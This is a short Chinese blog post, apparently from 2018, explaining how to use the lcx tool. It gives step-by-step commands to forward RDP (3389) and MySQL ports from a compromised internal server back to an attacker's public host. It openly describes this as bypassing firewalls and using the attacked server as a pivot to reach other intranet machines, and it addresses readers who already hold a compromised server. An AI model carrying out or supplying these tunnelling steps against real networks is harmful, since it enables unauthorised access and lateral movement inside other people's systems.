lcx工具使用

 

0x01 为什么要作端口转发?

 

如果外网服务器,我们直接连接其端口就能进行访问,不需要进行端口转发。所以端口转发常用于穿透防火墙。

 

 

0x02 快速使用

 

前提:你的计算机处于公网,被控制的计算机能访问外网

 

一般情况连接内网的3389需要4步:

 

1:确定被控制计算机的内网ip

2:被控制的计算机执行”lcx -slave 你的计算机ip 51 被控制计算机的ip 3389”

3:本机执行”lcx -listen 34 2389”

4:用mstsc 连接“127.0.0.1:2389”

 

在本机上运行:

 

lcx –listen 34 2389,说明一下这句指令的意思,这句话的意思就是监听本机的34端口然后将数据转发到2389端口,当然这里的34 2389端口是依心情而定,但是,必须要注意这些端口也不能使用那些本机已经开放的端口。

 

内网服务器上运行:(拿到可执行权限作如下操作)

 

我假设:219.222.181.181为我自己的ip,192.168.0.2 3389为内网服务器的ip。

说说这句话的意思:slave为奴隶的意思,顾名思义,即内网服务器甘愿将自己的3389给219.222.181.181的34端口!

 

连接:现在所有步骤都完成了,就等着你进行连接了,不要告诉我到这个时候你还是不会连哦,到手的服务器都不要吗?

 

 

0x03 了解工具

 

这是lcx使用说明

 

Lcx有两大功能,一个是端口转发(listen和slave成对使用),另一个是端口映射(tran)。

 

端口转发:

 

Lcx -Listen <监听slave请求的端口(对应slave 的第二个参数)> <等待连接的端口>

Lcx -slave <你的ip> <监听端口(对应listen的第一个参数)> <目标ip> <目标端口>

 

所以既然我们只需要连接那台服务器,我们只需要设置目标ip参数为127.0.0.1就好了(127.0.0.1 Localhost 即本机)因为别忘了slave是在对面服务器执行的。当然了这里补充一点目标端口号是可以换的比如3306这样你就可以连接对面的MySQL数据库了。有些人肯定要问了如果把这个127.0.0.1换成其他的ip会怎么样,如果你尝试过了那么恭喜你发现了新功能,你可以访问更多的3389。

 

1、本机执行lcx -listen 40050 10000

2、被控制服务器执行 lcx -slave 1.1.1.1 40050 10.10.0.3 3389

3、连接成功之后中间就出现了一条通道,可以互相传输数据

4、我们打开mstsc 输入127.0.0.1:10000

 

Ok,这样我们就能访问内网的其他机子了,理论上来说被控制的服务器能访问到的我们都能访问,其实就是以被攻击的服务器做跳板。扩展一点讲,还记得listen的参数么?第一个是监听slave请求的端口,另一个监听端口,这个监听端口我们可以访问,当然别人也可以访问(一般用来共享)。

在1.1.1.1做好监听并且对面执行slave且成功的话1.1.1.2和1.1.1.3就可以用mstsc连接1.1.1.1:10000来访问到对面10.10.0.3的3389了。

 

端口映射:

 

Lcx -tran <等待连接的端口> <目标ip> <目标端口>

Lcx -tran 1920 127.0.0.1 21

这样我访问本机的1920端口就能访问到本机的ftp了,当然把127.0.0.1换成其他的ip都可以。

 

0x04 参考链接:

 

http://www.freebuf.com/sectool/126967.html

posted @ 2018-05-11 13:55  时光不改  阅读(1625)  评论(0编辑  收藏  举报